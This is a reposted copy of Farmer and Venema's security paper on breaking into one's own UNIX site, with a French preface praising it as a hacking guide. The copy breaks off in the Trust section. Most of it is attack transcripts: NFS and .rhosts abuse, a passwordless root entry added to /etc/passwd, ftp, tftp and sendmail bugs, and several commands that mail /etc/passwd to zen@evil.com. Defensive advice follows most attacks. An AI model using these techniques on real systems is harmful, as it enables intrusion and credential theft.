Nota: j'ai mis ce fichier car il traite presque parfaitement des nouveau type
|
||
de hacking que l'on peut faire.
|
||
C'est vraiment un document EXCELLENT !!
|
||
_ _ _
|
||
|
||
_Improving the Security of Your Site by Breaking Into it_
|
||
|
||
Dan Farmer Wietse Venema
|
||
Sun Microsystems Eindhoven University of Technology
|
||
zen@sun.com wietse@wzv.win.tue.nl
|
||
|
||
Introduction
|
||
------------
|
||
|
||
Every day, all over the world, computer networks and hosts are being
|
||
broken into. The level of sophistication of these attacks varies
|
||
widely; while it is generally believed that most break-ins succeed due
|
||
to weak passwords, there are still a large number of intrusions that use
|
||
more advanced techniques to break in. Less is known about the latter
|
||
types of break-ins, because by their very nature they are much harder to
|
||
detect.
|
||
|
||
-----
|
||
|
||
CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley.
|
||
Purdue. Sun. You name it, we've seen it broken into. Anything that is
|
||
on the Internet (and many that isn't) seems to be fairly easy game. Are
|
||
these targets unusual? What happened?
|
||
|
||
Fade to...
|
||
|
||
A young boy, with greasy blonde hair, sitting in a dark room. The room
|
||
is illuminated only by the luminescense of the C64's 40 character
|
||
screen. Taking another long drag from his Benson and Hedges cigarette,
|
||
the weary system cracker telnets to the next faceless ".mil" site on his
|
||
hit list. "guest -- guest", "root -- root", and "system -- manager" all
|
||
fail. No matter. He has all night... he pencils the host off of his
|
||
list, and tiredly types in the next potential victim...
|
||
|
||
This seems to be the popular image of a system cracker. Young,
|
||
inexperienced, and possessing vast quantities of time to waste, to get
|
||
into just one more system. However, there is a far more dangerous type
|
||
of system cracker out there. One who knows the ins and outs of the
|
||
latest security auditing and cracking tools, who can modify them for
|
||
specific attacks, and who can write his/her own programs. One who not
|
||
only reads about the latest security holes, but also personally
|
||
discovers bugs and vulnerabilities. A deadly creature that can both
|
||
strike poisonously and hide its tracks without a whisper or hint of a
|
||
trail. The uebercracker is here.
|
||
|
||
-----
|
||
|
||
Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's
|
||
uebermensch, or, literally translated into English, "over man."
|
||
Nietzsche used the term not to refer to a comic book superman, but
|
||
instead a man who had gone beyond the incompetence, pettiness, and
|
||
weakness of the everyday man. The uebercracker is therefore the system
|
||
cracker who has gone beyond simple cookbook methods of breaking into
|
||
systems. An uebercracker is not usually motivated to perform random
|
||
acts of violence. Targets are not arbitrary -- there is a purpose,
|
||
whether it be personal monetary gain, a hit and run raid for
|
||
information, or a challenge to strike a major or prestigious site or
|
||
net.personality. An uebercracker is hard to detect, harder to stop, and
|
||
hardest to keep out of your site for good.
|
||
|
||
Overview
|
||
--------
|
||
|
||
In this paper we will take an unusual approach to system security.
|
||
Instead of merely saying that something is a problem, we will look
|
||
through the eyes of a potential intruder, and show _why_ it is one. We
|
||
will illustrate that even seemingly harmless network services can become
|
||
valuable tools in the search for weak points of a system, even when
|
||
these services are operating exactly as they are intended to.
|
||
|
||
In an effort to shed some light on how more advanced intrusions occur,
|
||
this paper outlines various mechanisms that crackers have actually used
|
||
to obtain access to systems and, in addition, some techniques we either
|
||
suspect intruders of using, or that we have used ourselves in tests or
|
||
in friendly/authorized environments.
|
||
|
||
Our motivation for writing this paper is that system administrators are
|
||
often unaware of the dangers presented by anything beyond the most
|
||
trivial attacks. While it is widely known that the proper level of
|
||
protection depends on what has to be protected, many sites appear to
|
||
lack the resources to assess what level of host and network security is
|
||
adequate. By showing what intruders can do to gain access to a remote
|
||
site, we are trying to help system administrators to make _informed_
|
||
decisions on how to secure their site -- or not. We will limit the
|
||
discussion to techniques that can give a remote intruder access to a
|
||
(possibly non-interactive) shell process on a UNIX host. Once this is
|
||
achieved, the details of obtaining root privilege are beyond the scope
|
||
of this work -- we consider them too site-dependent and, in many cases,
|
||
too trivial to merit much discussion.
|
||
|
||
We want to stress that we will not merely run down a list of bugs or
|
||
security holes -- there will always be new ones for a potential attacker
|
||
to exploit. The purpose of this paper is to try to get the reader to
|
||
look at her or his system in a new way -- one that will hopefully afford
|
||
him or her the opportunity to _understand_ how their system can be
|
||
compromised, and how.
|
||
|
||
We would also like to reiterate to the reader that the purpose of this
|
||
paper is to show you how to test the security of your own site, not how
|
||
to break into other people's systems. The intrusion techniques we
|
||
illustrate here will often leave traces in your system auditing logs --
|
||
it might be constructive to examine them after trying some of these
|
||
attacks out, to see what a real attack might look like. Certainly other
|
||
sites and system administrators will take a very dim view of your
|
||
activities if you decide to use their hosts for security testing without
|
||
advance authorization; indeed, it is quite possible that legal action
|
||
may be pursued against you if they perceive it as an attack.
|
||
|
||
There are four main parts to the paper. The first part is the
|
||
introduction and overview. The second part attempts to give the reader
|
||
a feel for what it is like to be an intruder and how to go from knowing
|
||
nothing about a system to compromising its security. This section goes
|
||
over actual techniques to gain information and entrance and covers basic
|
||
strategies such as exploiting trust and abusing improperly configured
|
||
basic network services (ftp, mail, tftp, etc.) It also discusses
|
||
slightly more advanced topics, such as NIS and NFS, as well as various
|
||
common bugs and configuration problems that are somewhat more OS or
|
||
system specific. Defensive strategies against each of the various
|
||
attacks are also covered here.
|
||
|
||
The third section deals with trust: how the security of one system
|
||
depends on the integrity of other systems. Trust is the most complex
|
||
subject in this paper, and for the sake of brevity we will limit the
|
||
discussion to clients in disguise.
|
||
|
||
The fourth section covers the basic steps that a system administrator
|
||
may take to protect her or his system. Most of the methods presented
|
||
here are merely common sense, but they are often ignored in practice --
|
||
one of our goals is to show just how dangerous it can be to ignore basic
|
||
security practices.
|
||
|
||
Case studies, pointers to security-related information, and software are
|
||
described in the appendices at the end of the paper.
|
||
|
||
While exploring the methods and strategies discussed in this paper we we
|
||
wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in
|
||
shell, perl, expect and C, it examines a remote host or set of hosts and
|
||
gathers as much information as possible by remotely probing NIS, finger,
|
||
NFS, ftp and tftp, rexd, and other services. This information includes
|
||
the presence of various network information services as well as
|
||
potential security flaws -- usually in the form of incorrectly setup or
|
||
configured network services, well-known bugs in system or network
|
||
utilities, or poor or ignorant policy decisions. It then can either
|
||
report on this data or use an expert system to further investigate any
|
||
potential security problems. While SATAN doesn't use all of the methods
|
||
that we discuss in the paper, it has succeeded with ominous regularity
|
||
in finding serious holes in the security of Internet sites. It will be
|
||
posted and made available via anonymous ftp when completed; Appendix A
|
||
covers its salient features.
|
||
|
||
Note that it isn't possible to cover all possible methods of breaking
|
||
into systems in a single paper. Indeed, we won't cover two of the most
|
||
effective methods of breaking into hosts: social engineering and
|
||
password cracking. The latter method is so effective, however, that
|
||
several of the strategies presented here are geared towards acquiring
|
||
password files. In addition, while windowing systems (X, OpenWindows,
|
||
etc.) can provide a fertile ground for exploitation, we simply don't
|
||
know many methods that are used to break into remote systems. Many
|
||
system crackers use non-bitmapped terminals which can prevent them from
|
||
using some of the more interesting methods to exploit windowing systems
|
||
effectively (although being able to monitor the victim's keyboard is
|
||
often sufficient to capture passwords). Finally, while worms, viruses,
|
||
trojan horses, and other malware are very interesting, they are not
|
||
common (on UNIX systems) and probably will use similar techniques to the
|
||
ones we describe in this paper as individual parts to their attack
|
||
strategy.
|
||
|
||
Gaining Information
|
||
-------------------
|
||
|
||
Let us assume that you are the head system administrator of Victim
|
||
Incorporated's network of UNIX workstations. In an effort to secure
|
||
your machines, you ask a friendly system administrator from a nearby
|
||
site (evil.com) to give you an account on one of her machines so that
|
||
you can look at your own system's security from the outside.
|
||
|
||
What should you do? First, try to gather information about your
|
||
(target) host. There is a wealth of network services to look at:
|
||
finger, showmount, and rpcinfo are good starting points. But don't stop
|
||
there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
|
||
and as many other services as you can find. There are so many methods
|
||
and techniques that space precludes us from showing all of them, but we
|
||
will try to show a cross-section of the most common and/or dangerous
|
||
strategies that we have seen or have thought of. Ideally, you would
|
||
gather such information about all hosts on the subnet or area of attack
|
||
-- information is power -- but for now we'll examine only our intended
|
||
target.
|
||
|
||
To start out, you look at what the ubiquitous finger command shows you
|
||
(assume it is 6pm, Nov 6, 1993):
|
||
|
||
victim % finger @victim.com
|
||
[victim.com]
|
||
Login Name TTY Idle When Where
|
||
zen Dr. Fubar co 1d Wed 08:00 death.com
|
||
|
||
Good! A single idle user -- it is likely that no one will notice if you
|
||
actually manage to break in.
|
||
|
||
Now you try more tactics. As every finger devotee knows, fingering "@",
|
||
"0", and "", as well as common names, such as root, bin, ftp, system,
|
||
guest, demo, manager, etc., can reveal interesting information. What
|
||
that information is depends on the version of finger that your target is
|
||
running, but the most notable are account names, along with their home
|
||
directories and the host that they last logged in from.
|
||
|
||
To add to this information, you can use rusers (in particular with the
|
||
-l flag) to get useful information on logged-in users.
|
||
|
||
Trying these commands on victim.com reveals the following information,
|
||
presented in a compressed tabular form to save space:
|
||
|
||
Login Home-dir Shell Last login, from where
|
||
----- -------- ----- ----------------------
|
||
root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com
|
||
bin /bin Never logged in
|
||
nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co
|
||
daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com
|
||
sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com
|
||
zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com
|
||
sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com
|
||
guest /export/foo /bin/sh Never logged in
|
||
ftp /home/ftp Never logged in
|
||
|
||
Both our experiments with SATAN and watching system crackers at work
|
||
have proved to us that finger is one of the most dangerous services,
|
||
because it is so useful for investigating a potential target. However,
|
||
much of this information is useful only when used in conjunction with
|
||
other data.
|
||
|
||
For instance, running showmount on your target reveals:
|
||
|
||
evil % showmount -e victim.com
|
||
export list for victim.com:
|
||
/export (everyone)
|
||
/var (everyone)
|
||
/usr easy
|
||
/export/exec/kvm/sun4c.sunos.4.1.3 easy
|
||
/export/root/easy easy
|
||
/export/swap/easy easy
|
||
|
||
Note that /export/foo is exported to the world; also note that this is
|
||
user guest's home directory. Time for your first break-in! In this
|
||
case, you'll mount the home directory of user "guest." Since you don't
|
||
have a corresponding account on the local machine and since root cannot
|
||
modify files on an NFS mounted filesystem, you create a "guest" account
|
||
in your local password file. As user guest you can put an .rhosts entry
|
||
in the remote guest home directory, which will allow you to login to the
|
||
target machine without having to supply a password.
|
||
|
||
evil # mount victim.com:/export/foo /foo
|
||
evil # cd /foo
|
||
evil # ls -lag
|
||
total 3
|
||
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
|
||
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
|
||
1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest
|
||
evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
|
||
evil # ls -lag
|
||
total 3
|
||
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
|
||
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
|
||
1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest
|
||
evil # su guest
|
||
evil % echo victim.com >> guest/.rhosts
|
||
evil % rlogin victim.com
|
||
Welcome to victim.com!
|
||
victim %
|
||
|
||
If, instead of home directories, victim.com were exporting filesystems
|
||
with user commands (say, /usr or /usr/local/bin), you could replace a
|
||
command with a trojan horse that executes any command of your choice.
|
||
The next user to execute that command would execute your program.
|
||
|
||
We suggest that filesystems be exported:
|
||
|
||
o Read/write only to specific, trusted clients.
|
||
o Read-only, where possible (data or programs can often be
|
||
exported in this manner.)
|
||
|
||
If the target has a "+" wildcard in its /etc/hosts.equiv (the default in
|
||
various vendor's machines) or has the netgroups bug (CERT advisory
|
||
91:12), any non-root user with a login name in the target's password
|
||
file can rlogin to the target without a password. And since the user
|
||
"bin" often owns key files and directories, your next attack is to try
|
||
to log in to the target host and modify the password file to let you
|
||
have root access:
|
||
|
||
evil % whoami
|
||
bin
|
||
evil % rsh victim.com csh -i
|
||
Warning: no access to tty; thus no job control in this shell...
|
||
victim % ls -ldg /etc
|
||
drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
|
||
victim % cd /etc
|
||
victim % mv passwd pw.old
|
||
victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
|
||
victim % ^D
|
||
evil % rlogin victim.com -l toor
|
||
Welcome to victim.com!
|
||
victim #
|
||
|
||
A few notes about the method used above; "rsh victim.com csh -i" is used
|
||
to initially get onto the system because it doesn't leave any traces in
|
||
the wtmp or utmp system auditing files, making the rsh invisible for
|
||
finger and who. The remote shell isn't attached to a pseudo-terminal,
|
||
however, so that screen-oriented programs such as pagers and editors
|
||
will fail -- but it is very handy for brief exploration.
|
||
|
||
The COPS security auditing tool (see appendix D) will report key files
|
||
or directories that are writable to accounts other than the
|
||
superuser. If you run SunOS 4.x you can apply patch 100103 to fix most
|
||
file permission problems. On many systems, rsh probes as shown above,
|
||
even when successful, would remain completely unnoticed; the tcp wrapper
|
||
(appendix D), which logs incoming connections, can help to expose such
|
||
activities.
|
||
|
||
----
|
||
|
||
What now? Have you uncovered all the holes on your target system? Not
|
||
by a long shot. Going back to the finger results on your target, you
|
||
notice that it has an "ftp" account, which usually means that anonymous
|
||
ftp is enabled. Anonymous ftp can be an easy way to get access, as it
|
||
is often misconfigured. For example, the target may have a complete
|
||
copy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory
|
||
instead of a stripped down version. In this example, though, you see
|
||
that the latter doesn't seem to be true (how can you tell without
|
||
actually examining the file?) However, the home directory of ftp on
|
||
victim.com is writable. This allows you to remotely execute a command
|
||
-- in this case, mailing the password file back to yourself -- by the
|
||
simple method of creating a .forward file that executes a command when
|
||
mail is sent to the ftp account. This is the same mechanism of piping
|
||
mail to a program that the "vacation" program uses to automatically
|
||
reply to mail messages.
|
||
|
||
evil % cat forward_sucker_file
|
||
"|/bin/mail zen@evil.com < /etc/passwd"
|
||
|
||
evil % ftp victim.com
|
||
Connected to victim.com
|
||
220 victim FTP server ready.
|
||
Name (victim.com:zen): ftp
|
||
331 Guest login ok, send ident as password.
|
||
Password:
|
||
230 Guest login ok, access restrictions apply.
|
||
ftp> ls -lga
|
||
200 PORT command successful.
|
||
150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes).
|
||
total 5
|
||
drwxr-xr-x 4 101 1 512 Jun 20 1991 .
|
||
drwxr-xr-x 4 101 1 512 Jun 20 1991 ..
|
||
drwxr-xr-x 2 0 1 512 Jun 20 1991 bin
|
||
drwxr-xr-x 2 0 1 512 Jun 20 1991 etc
|
||
drwxr-xr-x 3 101 1 512 Aug 22 1991 pub
|
||
226 ASCII Transfer complete.
|
||
242 bytes received in 0.066 seconds (3.6 Kbytes/s)
|
||
ftp> put forward_sucker_file .forward
|
||
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
|
||
ftp> quit
|
||
evil % echo test | mail ftp@victim.com
|
||
|
||
Now you simply wait for the password file to be sent back to you.
|
||
|
||
The security auditing tool COPS will check your anonymous ftp setup; see
|
||
the man page for ftpd, the documentation/code for COPS, or CERT advisory
|
||
93:10 for information on how to set up anonymous ftp correctly.
|
||
Vulnerabilities in ftp are often a matter of incorrect ownership or
|
||
permissions of key files or directories. At the very least, make sure
|
||
that ~ftp and all "system" directories and files below ~ftp are owned by
|
||
root and are not writable by any user.
|
||
|
||
While looking at ftp, you can check for an older bug that was once
|
||
widely exploited:
|
||
|
||
% ftp -n
|
||
ftp> open victim.com
|
||
Connected to victim.com
|
||
220 victim.com FTP server ready.
|
||
ftp> quote user ftp
|
||
331 Guest login ok, send ident as password.
|
||
ftp> quote cwd ~root
|
||
530 Please login with USER and PASS.
|
||
ftp> quote pass ftp
|
||
230 Guest login ok, access restrictions apply.
|
||
ftp> ls -al / (or whatever)
|
||
|
||
If this works, you now are logged in as root, and able to modify the
|
||
password file, or whatever you desire. If your system exhibits this
|
||
bug, you should definitely get an update to your ftpd daemon, either
|
||
from your vendor or (via anon ftp) from ftp.uu.net.
|
||
|
||
The wuarchive ftpd, a popular replacement ftp daemon put out by the
|
||
Washington University in Saint Louis, had almost the same problem. If
|
||
your wuarchive ftpd pre-dates April 8, 1993, you should replace it by a
|
||
more recent version.
|
||
|
||
Finally, there is a program vaguely similar to ftp -- tftp, or the
|
||
trivial file transfer program. This daemon doesn't require any password
|
||
for authentication; if a host provides tftp without restricting the
|
||
access (usually via some secure flag set in the inetd.conf file), an
|
||
attacker can read and write files anywhere on the system. In the
|
||
example, you get the remote password file and place it in your local
|
||
/tmp directory:
|
||
|
||
evil % tftp
|
||
tftp> connect victim.com
|
||
tftp> get /etc/passwd /tmp/passwd.victim
|
||
tftp> quit
|
||
|
||
For security's sake, tftp should not be run; if tftp is necessary, use
|
||
the secure option/flag to restrict access to a directory that has no
|
||
valuable information, or run it under the control of a chroot wrapper
|
||
program.
|
||
|
||
----
|
||
|
||
If none of the previous methods have worked, it is time to go on to more
|
||
drastic measures. You have a friend in rpcinfo, another very handy
|
||
program, sometimes even more useful than finger. Many hosts run RPC
|
||
services that can be exploited; rpcinfo can talk to the portmapper and
|
||
show you the way. It can tell you if the host is running NIS, if it is
|
||
a NIS server or slave, if a diskless workstation is around, if it is
|
||
running NFS, any of the info services (rusersd, rstatd, etc.), or any
|
||
other unusual programs (auditing or security related). For instance,
|
||
going back to our sample target:
|
||
|
||
evil % rpcinfo -p victim.com [output trimmed for brevity's sake]
|
||
program vers proto port
|
||
100004 2 tcp 673 ypserv
|
||
100005 1 udp 721 mountd
|
||
100003 2 udp 2049 nfs
|
||
100026 1 udp 733 bootparam
|
||
100017 1 tcp 1274 rexd
|
||
|
||
In this case, you can see several significant facts about our target;
|
||
first of which is that it is an NIS server. It is perhaps not widely
|
||
known, but once you know the NIS domainname of a server, you can get any
|
||
of its NIS maps by a simple rpc query, even when you are outside the
|
||
subnet served by the NIS server (for example, using the YPX program that
|
||
can be found in the comp.sources.misc archives on ftp.uu.net). In
|
||
addition, very much like easily guessed passwords, many systems use
|
||
easily guessed NIS domainnames. Trying to guess the NIS domainname is
|
||
often very fruitful. Good candidates are the fully and partially
|
||
qualified hostname (e.g. "victim" and "victim.com"), the organization
|
||
name, netgroup names in "showmount" output, and so on. If you wanted to
|
||
guess that the domainname was "victim", you could type:
|
||
|
||
evil % ypwhich -d victim victim.com
|
||
Domain victim not bound.
|
||
|
||
This was an unsuccessful attempt; if you had guessed correctly it would
|
||
have returned with the host name of victim.com's NIS server. However,
|
||
note from the NFS section that victim.com is exporting the "/var"
|
||
directory to the world. All that is needed is to mount this directory
|
||
and look in the "yp" subdirectory -- among other things you will see
|
||
another subdirectory that contains the domainname of the target.
|
||
|
||
evil # mount victim.com:/var /foo
|
||
evil # cd /foo
|
||
evil # /bin/ls -alg /foo/yp
|
||
total 17
|
||
1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 .
|
||
1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 ..
|
||
11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile
|
||
1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding
|
||
2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar
|
||
[...]
|
||
|
||
In this case, "foo_bar" is the NIS domain name.
|
||
|
||
In addition, the NIS maps often contain a good list of user/employee
|
||
names as well as internal host lists, not to mention passwords for
|
||
cracking.
|
||
|
||
Appendix C details the results of a case study on NIS password files.
|
||
|
||
----
|
||
|
||
You note that the rpcinfo output also showed that victim.com runs rexd.
|
||
Like the rsh daemon, rexd processes requests of the form "please execute
|
||
this command as that user". Unlike rshd, however, rexd does not care if
|
||
the client host is in the hosts.equiv or .rhost files. Normally the rexd
|
||
client program is the "on" command, but it only takes a short C program
|
||
to send arbitrary client host and userid information to the rexd server;
|
||
rexd will happily execute the command. For these reasons, running rexd
|
||
is similar to having no passwords at all: all security is in the client,
|
||
not in the server where it should be. Rexd security can be improved
|
||
somewhat by using secure RPC.
|
||
|
||
----
|
||
|
||
While looking at the output from rpcinfo, you observe that victim.com
|
||
also seems to be a server for diskless workstations. This is evidenced
|
||
by the presence of the bootparam service, which provides information to
|
||
the diskless clients for booting. If you ask nicely, using
|
||
BOOTPARAMPROC_WHOAMI and provide the address of a client, you can get
|
||
its NIS domainname. This can be very useful when combined with the fact
|
||
that you can get arbitrary NIS maps (such as the password file) when you
|
||
know the NIS domainname. Here is a sample code snippet to do just that
|
||
(bootparam is part of SATAN.)
|
||
|
||
char *server;
|
||
struct bp_whoami_arg arg; /* query */
|
||
struct bp_whoami_res res; /* reply */
|
||
|
||
/* initializations omitted... */
|
||
|
||
callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI,
|
||
xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res);
|
||
|
||
printf("%s has nisdomain %s\n", server, res.domain_name);
|
||
|
||
The showmount output indicated that "easy" is a diskless client of
|
||
victim.com, so we use its client address in the BOOTPARAMPROC_WHOAMI
|
||
query:
|
||
|
||
evil % bootparam victim.com easy.victim.com
|
||
victim.com has nisdomain foo_bar
|
||
|
||
----
|
||
|
||
NIS masters control the mail aliases for the NIS domain in question.
|
||
Just like local mail alias files, you can create a mail alias that will
|
||
execute commands when mail is sent to it (a once popular example of this
|
||
is the "decode" alias which uudecodes mail files sent to it.) For
|
||
instance, here you create an alias "foo", which mails the password file
|
||
back to evil.com by simply mailing any message to it:
|
||
|
||
nis-master # echo 'foo: "| mail zen@evil.com < /etc/passwd "' >> /etc/aliases
|
||
nis-master # cd /var/yp
|
||
nis-master # make aliases
|
||
nis-master # echo test | mail -v foo@victim.com
|
||
|
||
Hopefully attackers won't have control of your NIS master host, but even
|
||
more hopefully the lesson is clear -- NIS is normally insecure, but if
|
||
an attacker has control of your NIS master, then s/he effectively has
|
||
control of the client hosts (e.g. can execute arbitrary commands).
|
||
|
||
There aren't many effective defenses against NIS attacks; it is an
|
||
insecure service that has almost no authentication between clients and
|
||
servers. To make things worse, it seems fairly clear that arbitrary
|
||
maps can be forced onto even master servers (e.g., it is possible to
|
||
treat an NIS server as a client). This, obviously, would subvert the
|
||
entire schema. If it is absolutely necessary to use NIS, choosing a
|
||
hard to guess domainname can help slightly, but if you run diskless
|
||
clients that are exposed to potential attackers then it is trivial for
|
||
an attacker to defeat this simple step by using the bootparam trick to
|
||
get the domainname. If NIS is used to propagate the password maps, then
|
||
shadow passwords do not give additional protection because the shadow
|
||
map is still accessible to any attacker that has root on an attacking
|
||
host. Better is to use NIS as little as possible, or to at least
|
||
realize that the maps can be subject to perusal by potentially hostile
|
||
forces.
|
||
|
||
Secure RPC goes a long way to diminish the threat, but it has its own
|
||
problems, primarily in that it is difficult to administer, but also in
|
||
that the cryptographic methods used within are not very strong. It has
|
||
been rumored that NIS+, Sun's new network information service, fixes
|
||
some of these problems, but until now it has been limited to running on
|
||
Suns, and thus far has not lived up to the promise of the design.
|
||
Finally, using packet filtering (at the very least port 111) or
|
||
securelib (see appendix D), or, for Suns, applying Sun patch 100482-02
|
||
all can help.
|
||
|
||
----
|
||
|
||
The portmapper only knows about RPC services. Other network services
|
||
can be located with a brute-force method that connects to all network
|
||
ports. Many network utilities and windowing systems listen to specific
|
||
ports (e.g. sendmail is on port 25, telnet is on port 23, X windows is
|
||
usually on port 6000, etc.) SATAN includes a program that scans the
|
||
ports of a remote hosts and reports on its findings; if you run it
|
||
against our target, you see:
|
||
|
||
evil % tcpmap victim.com
|
||
Mapping 128.128.128.1
|
||
port 21: ftp
|
||
port 23: telnet
|
||
port 25: smtp
|
||
port 37: time
|
||
port 79: finger
|
||
port 512: exec
|
||
port 513: login
|
||
port 514: shell
|
||
port 515: printer
|
||
port 6000: (X)
|
||
|
||
This suggests that victim.com is running X windows. If not protected
|
||
properly (via the magic cookie or xhost mechanisms), window displays can
|
||
be captured or watched, user keystrokes may be stolen, programs executed
|
||
remotely, etc. Also, if the target is running X and accepts a telnet to
|
||
port 6000, that can be used for a denial of service attack, as the
|
||
target's windowing system will often "freeze up" for a short period of
|
||
time. One method to determine the vulnerability of an X server is to
|
||
connect to it via the XOpenDisplay() function; if the function returns
|
||
NULL then you cannot access the victim's display (opendisplay is part of
|
||
SATAN):
|
||
|
||
char *hostname;
|
||
|
||
if (XOpenDisplay(hostname) == NULL) {
|
||
printf("Cannot open display: %s\n", hostname);
|
||
} else {
|
||
printf("Can open display: %s\n", hostname);
|
||
}
|
||
|
||
evil % opendisplay victim.com:0
|
||
Cannot open display: victim.com:0
|
||
|
||
X terminals, though much less powerful than a complete UNIX system, can
|
||
have their own security problems. Many X terminals permit unrestricted
|
||
rsh access, allowing you to start X client programs in the victim's
|
||
terminal with the output appearing on your own screen:
|
||
|
||
evil % xhost +xvictim.victim.com
|
||
evil % rsh xvictim.victim.com telnet victim.com -display evil.com
|
||
|
||
In any case, give as much thought to your window security as your
|
||
filesystem and network utilities, for it can compromise your system as
|
||
surely as a "+" in your hosts.equiv or a passwordless (root) account.
|
||
|
||
----
|
||
|
||
Next, you examine sendmail. Sendmail is a very complex program that has
|
||
a long history of security problems, including the infamous "wiz"
|
||
command (hopefully long since disabled on all machines). You can often
|
||
determine the OS, sometimes down to the version number, of the target,
|
||
by looking at the version number returned by sendmail. This, in turn,
|
||
can give you hints as to how vulnerable it might be to any of the
|
||
numerous bugs. In addition, you can see if they run the "decode" alias,
|
||
which has its own set of problems:
|
||
|
||
evil % telnet victim.com 25
|
||
connecting to host victim.com (128.128.128.1.), port 25
|
||
connection open
|
||
220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
|
||
expn decode
|
||
250 <"|/usr/bin/uudecode">
|
||
quit
|
||
|
||
Running the "decode" alias is a security risk -- it allows potential
|
||
attackers to overwrite any file that is writable by the owner of that
|
||
alias -- often daemon, but potentially any user. Consider this piece of
|
||
mail -- this will place "evil.com" in user zen's .rhosts file if it is
|
||
writable:
|
||
|
||
evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail decode@victim.com
|
||
|
||
If no home directories are known or writable, an interesting variation
|
||
of this is to create a bogus /etc/aliases.pag file that contains an
|
||
alias with a command you wish to execute on your target. This may work
|
||
since on many systems the aliases.pag and aliases.dir files, which
|
||
control the system's mail aliases, are writable to the world.
|
||
|
||
evil % cat decode
|
||
bin: "| cat /etc/passwd | mail zen@evil.com"
|
||
evil % newaliases -oQ/tmp -oA`pwd`/decode
|
||
evil % uuencode decode.pag /etc/aliases.pag | mail decode@victom.com
|
||
evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null
|
||
|
||
A lot of things can be found out by just asking sendmail if an address
|
||
is acceptable (vrfy), or what an address expands to (expn). When the
|
||
finger or rusers services are turned off, vrfy and expn can still be
|
||
used to identify user accounts or targets. Vrfy and expn can also be
|
||
used to find out if the user is piping mail through any program that
|
||
might be exploited (e.g. vacation, mail sorters, etc.). It can be a
|
||
good idea to disable the vrfy and expn commands: in most versions, look
|
||
at the source file srvrsmtp.c, and either delete or change the two lines
|
||
in the CmdTab structure that have the strings "vrfy" and "expn". Sites
|
||
without source can still disable expn and vrfy by just editing the
|
||
sendmail executable with a binary editor and replacing "vrfy" and "expn"
|
||
with blanks. Acquiring a recent version of sendmail (see Appendix D) is
|
||
also an extremely good idea, since there have probably been more
|
||
security bugs reported in sendmail than in any other UNIX program.
|
||
|
||
----
|
||
|
||
As a sendmail-sendoff, there are two fairly well known bugs that should
|
||
be checked into. The first was definitely fixed in version 5.59 from
|
||
Berkeley; despite the messages below, for versions of sendmail previous
|
||
to 5.59, the "evil.com" gets appended, despite the error messages, along
|
||
with all of the typical mail headers, to the file specified:
|
||
|
||
% cat evil_sendmail
|
||
telnet victim.com 25 << EOSM
|
||
rcpt to: /home/zen/.rhosts
|
||
mail from: zen
|
||
data
|
||
random garbage
|
||
.
|
||
rcpt to: /home/zen/.rhosts
|
||
mail from: zen
|
||
data
|
||
evil.com
|
||
.
|
||
quit
|
||
EOSM
|
||
|
||
evil % /bin/sh evil_sendmail
|
||
Trying 128.128.128.1
|
||
Connected to victim.com
|
||
Escape character is '^]'.
|
||
Connection closed by foreign host.
|
||
|
||
evil % rlogin victim.com -l zen
|
||
Welcome to victim.com!
|
||
victim %
|
||
|
||
The second hole, fixed only recently, permitted anyone to specify
|
||
arbitrary shell commands and/or pathnames for the sender and/or
|
||
destination address. Attempts to keep details secret were in vain, and
|
||
extensive discussions in mailing lists and usenet news groups led to
|
||
disclosure of how to exploit some versions of the bug. As with many
|
||
UNIX bugs, nearly every vendor's sendmail was vulnerable to the problem,
|
||
since they all share a common source code tree ancestry. Space
|
||
precludes us from discussing it fully, but a typical attack to get the
|
||
password file might look like this:
|
||
|
||
evil % telnet victim.com 25
|
||
Trying 128.128.128.1...
|
||
Connected to victim.com
|
||
Escape character is '^]'.
|
||
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
|
||
mail from: "|/bin/mail zen@evil.com < /etc/passwd"
|
||
250 "|/bin/mail zen@evil.com < /etc/passwd"... Sender ok
|
||
rcpt to: nosuchuser
|
||
550 nosuchuser... User unknown
|
||
data
|
||
354 Enter mail, end with "." on a line by itself
|
||
.
|
||
250 Mail accepted
|
||
quit
|
||
Connection closed by foreign host.
|
||
evil %
|
||
|
||
At the time of writing, version 8.6.4 of sendmail (see Appendix D for
|
||
information on how to get this) is reportedly the only variant of
|
||
sendmail with all of the recent security bugs fixed.
|
||
|
||
Trust
|
||
-----
|
||
|
||
For our final topic of vulnerability, we'll digress from the practical
|
||
strategy we've followed previously to go a bit more into the theoretical
|
||
side, and briefly discuss the notion of trust. The issues and
|
||
implications of vulnerabilities here are a bit more subtle and
|
||
far-reaching than what we've covered before; in the context of this
|
||
